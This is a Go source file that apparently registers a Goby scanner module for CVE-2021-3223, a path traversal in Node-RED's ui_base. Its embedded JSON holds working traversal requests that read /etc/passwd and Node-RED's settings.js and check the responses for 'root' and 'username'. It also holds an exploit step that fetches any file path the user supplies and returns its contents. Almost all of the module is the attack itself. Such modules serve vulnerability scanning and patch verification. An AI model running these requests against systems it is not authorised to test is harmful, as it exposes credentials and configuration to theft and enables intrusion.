package exploits

import (
	"git.gobies.org/goby/goscanner/goutils"
)

func init() {
	expJson := `{
  "Name": "Node-red UI_base Arbitrary File Read Vulnerability CVE-2021-3223",
  "Description": "Node-red is a tool for building Internet of Things (IoT) applications, with a focus on simplifying the \"wiring\" of blocks of code to perform tasks.\\nNode-red in (/nodes/ui_base.js), the URL matches (/ui_base/js/*) and passes it to (path.join),\\nLack of validation of the final path can lead to a path traversal vulnerability that can be exploited to read sensitive data on the server, such as settings.js",
  "Product": "Node-RED",
  "Homepage": "https://nodered.org/",
  "DisclosureDate": "2021-07-04",
  "Author": "luckying1314@gmail.com",
  "GobyQuery": "title=\"Node-RED\"",
  "Level": "2",
  "Impact": "<p><span style=\"font-size: 14px;\">Arbitrary file download or read vulnerability is mainly because when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter and does not verify the legitimacy of the file path, resulting in the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) way to download or read a file outside the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any file on the system through the vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in the sensitive information leakage of the system.</span><br></p>",
  "Recommandation": "<p><span style=\"font-size: 14px;\">Limit..</span><span style=\"font-size: 14px;\">/ symbol, file download to determine the input path, the best way is that the file should be in the database for one-to-one correspondence, avoid by entering the absolute path to get files</span><br></p>",
  "References": [
    "https://www.pwnwiki.org/index.php?title=CVE-2021-3223_Node-RED_ui_base_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/zh-cn"
  ],
  "HasExp": true,
  "ExpParams": [
    {
      "name": "filename",
      "type": "createSelect",
      "value": "/ui_base/js/.././../../../../../../../../etc/passwd,/ui_base/js/../../../../settings.js",
      "show": ""
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "OR",
    {
      "Request": {
        "method": "GET",
        "uri": "/ui_base/js/.././../../../../../../../../etc/passwd",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "root",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    },
    {
      "Request": {
        "method": "GET",
        "uri": "/ui_base/js/../../../../settings.js",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "username",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "{{{filename}}}",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "SetVariable": [
        "output|lastbody"
      ]
    }
  ],
  "Tags": [
    "fileread"
  ],
  "CVEIDs": [
    "CVE-2021-3223"
  ],
  "CVSSScore": "7.8",
  "AttackSurfaces": {
    "Application": [
      "Node-RED"
    ],
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}`

	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
}